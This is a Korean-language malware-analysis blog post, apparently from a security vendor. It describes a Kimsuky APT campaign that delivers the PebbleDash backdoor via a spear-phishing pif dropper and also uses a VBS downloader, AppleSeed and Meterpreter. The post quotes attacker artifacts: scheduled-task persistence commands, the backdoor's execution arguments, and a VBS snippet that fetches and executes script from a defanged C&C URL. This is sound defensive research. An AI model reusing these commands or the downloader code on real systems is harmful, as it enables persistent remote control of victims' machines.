Kimsuky 그룹의 APT 공격사례 (PebbleDash)
최근 ASEC 분석팀은 APT 공격을 시도하는 악성코드 동향을 지속적으로 파악하며 관련 내용을 공유하고 있다. 이번에 확인된 사례는 PebbleDash 백도어 악성코드를 이용한 공격 사례이며, 이외에도 AppleSeed, Meterpreter 및 추가적인 악성코드들의 로그를 확인할 수 있었다.
PebbleDash 백도어
공격자는 다음과 같은 스피어 피싱 메일을 전송하여 사용자로 하여금 첨부 파일로 보여지는 링크를 클릭하여 압축 파일을 다운로드 받고 실행하게 유도하였다.
스피어 피싱 메일
첨부된 zip 압축 파일의 압축을 해제하면 다음과 같이 “준공계.pif” 파일을 확인할 수 있다. 이 악성코드는 실제 악성 행위를 담당하는 PebbleDash 백도어 악성코드를 드랍하는 드로퍼 악성코드이다.
준공계.pif 드로퍼 악성코드
드로퍼 악성코드는 PebbleDash를 “C:\ProgramData\thumbs.db.pif” 경로에 드랍 및 실행하며, 동시에 정상 PDF 문서 파일 “C:\ProgramData\준공계.pdf”을 드랍 및 실행하기 때문에 사용자는 PDF 문서 파일을 실행한 것으로 인지시킨다.
함께 생성 및 실행되는 정상 PDF 문서 파일
이렇게 스피어 피싱 메일의 첨부 파일을 통해 설치된 PebbleDash는 공격자의 명령을 받아 악성 행위를 수행할수 있는 백도어 악성코드이다. C&C 서버로부터 전달받아 수행 가능한 명령들로는 프로세스 및 파일 작업 그리고 파일 다운로드 및 업로드 기능 등이 있으며 이에 따라 공격자는 PebbleDash를 이용해 시스템에 대한 제어를 획득할 수 있다.
이번에 확인된 PebbleDash는 올해부터 확인되고 있던 형태와 전체적으로 유사하지만 다음과 같은 차이점도 존재한다. 먼저 과거에는 실행 경로에 system32 폴더를 생성한 후 smss.exe 이름으로 복사하여 재귀 실행했던 것과 달리, 현재 확인된 PebbleDash는 system32 폴더를 생성하는 것은 동일하지만 lsass.exe 이름으로 설치한다.
PebbleDash는 실행 시 인자를 필요로하는데, 2021년 기준 인자로 사용된 이력이 있던 문자열은 “zWbTLWgKymXMDwZ”, “MskulCxGMCgpGdM” 였으며, 이번에 확인된 PebbleDash는 “njXbxuRQyujZeUAGGYaH”를 인자로서 필요로 한다.
“njXbxuRQyujZeUAGGYaH”를 인자로 받아 실행될 경우 자신을 동일 경로의 \system32\lsass.exe 즉 C:\ProgramData\system32\lsass.exe 경로로 복사 및 실행하는데 이 때는 “iFfmHUtawXNNxTHEiAAN”와 최초 실행 프로그램 경로를 인자로 주어 실행하고 원본 파일을 자가 삭제한다. 결과적으로 감염된 시스템에서는 아래와 같은 프로세스를 확인할 수 있다.
설치되어 실행 중인 PebbleDash
VBS 악성코드
위에서 확인된 PebbleDash는 한가지 사례에 불과하며, 해당 시스템 및 연관 시스템들에서는 추가적인 악성코드를 확인할 수 있었다. 첫번째는 VBS 악성코드이다. Kimsuky 그룹은 AppleSeed를 설치할때 위의 드로퍼 악성코드와 유사한 pif 드로퍼 악성코드를 이용한다. PebbleDash를 설치한 pif 드로퍼는 정상 문서 파일을 보여주고 PebbleDash만 설치하였지만, 일반적으로 AppleSeed를 설치하는 pif 드로퍼는 VBS 악성코드를 설치하는 추가적인 행위를 수행한다.
VBS 악성코드에 대한 사항은 아래의 상세 분석 보고서에서도 확인할 수 있으며, 구체적으로 mshta.exe를 이용해 외부에서 vbs를 다운로드 받아 실행하는 기능을 한다. 이 과정을 통해 다운로드되어 실행되는 추가적인 VBS 스크립트는 정보 탈취 및 2개의 작업 스케줄러를 등록하는데, 이전 사례에서는 다음과 같은 명령이 사용되었다.
> cmd /c schtasks /Create /SC minute /MO 20 /TN GoogleCache /TR "wscript //e:vbscript
//b C:\ProgramData\Chrome\.NetFramework.xml" /f
> cmd /c schtasks /Create /SC minute /MO 1 /TN GoogleUpdate /TR "regsvr32 /s
C:\ProgramData\Chrome\update.cfg" /f이번에 확인된 감염 시스템에서는 pif 드로퍼를 확인할 수 없었지만, 위의 사례와 유사하게 다음과 같은 작업 스케줄러가 등록되어 있었다.
"wscript //e:vbscript //b C:\ProgramData\Chrome\.NetFramework.xml"
"regsvr32 /sC:\ProgramData\Microsoft\Windows\update.cfg"수집된 “.NetFramework.xml” 파일은 확장자가 xml이지만 실제로는 vbs 악성코드이다. “.NetFramework.xml”는 다음과 같이 간단한 스크립트인데 기능 상으로는 외부에서 추가 스크립트를 다운로드 받아 실행시키는 기능이 전부이다.
On Error Resume Next:
Set rudrbvikmeaaaoja = CreateObject("MSXML2.ServerXMLHTTP.6.0"):
rudrbvikmeaaaoja.open "POST", "hxxp://m.sharing.p-e[.]kr/index.php?query=me",
False:rudrbvikmeaaaoja.Send:Execute(rudrbvikmeaaaoja.responseText):분석 당시 기준으로 C&C 서버에서 다음과 같은 간단한 명령을 전달하였다. 하지만 작업 스케줄러에 등록되어 주기적으로 명령을 다운로드 받아 실행하기 때문에 공격자가 다른 명령을 전달할 경우 악의적인 추가 명령을 수행할 수 있다.
Set WShell=CreateObject("WScript.Shell"):retu=WShell.run("cmd /c taskkill /im mshta.exe /f" , 0 ,true)
추가 로그
여기까지는 실제 확인된 파일들 위주로 분석을 진행하였다. VBS 악성코드는 AppleSeed를 설치하는 pif 드로퍼에 의해 설치되는데, 이에 따라 자사 ASD(AhnLab Smart Defense) 인프라 상에서도 AppleSeed의 로그를 확인할 수 있었다. 설치된 AppleSeed는 정상 소프트웨어 위장 경로에 설치되어 아래와 같은 커맨드 라인으로 실행되었다. 이러한 설치 경로는 AppleSeed의 대표적인 특징 중 하나이다.
regsvr32.exe /s "C:\ProgramData\Firmware\ESTsoft\Common\ESTCommon.dll"이외에도 AppleSeed 감염 시스템에 함께 설치되는 경향이 있는 메타스플로잇의 Meterpreter에 대한 로그도 확인되었다.
위에서는 확인된 악성코드들의 기능들을 간략하게 설명하였지만, 아래 블로그에서 각 악성코드들에 대한 상세한 분석 정보를 확인할 수 있다.
Kimsuky 그룹의 APT 공격 분석 보고서 (AppleSeed, PebbleDash) – ASEC BLOG
본 문서는 최근 Kimsuky 그룹에서 사용하는 악성코드들에 대한 분석 보고서이다. Kimsuky 그룹은 주로 스피어피싱과 같은 사회공학적 공격 방식을 이용하는데, 첨부 파일들의 이름으로 추정했을 때 공격 대상들은 주로 북한 및 외교 관련 업무를 수행하는 사용자들로 보인다. 자사 ASD 인프라의 감염 로그를 보면 공격 대상은 일반적인 기업들보다는 개인 사용자들이 다수인 것으로 확인되지만, 공공기관이나 기업들 또한 지속적으로 공격 대상이 되고 있다. 대표적으로 국내 대학교들이 주요 공격 대상이며 이외에도 IT 및 정보 통신 업체, 건…
[파일 진단]
- 파일 진단
Dropper/Win.LightShell (2021.12.16.01)
Backdoor/Win.PebbleDash.R458675 (2021.12.16.00)
Downloader/VBS.Agent (2021.12.08.00) - 행위 진단
Execution/MDP.Wscript.M3817
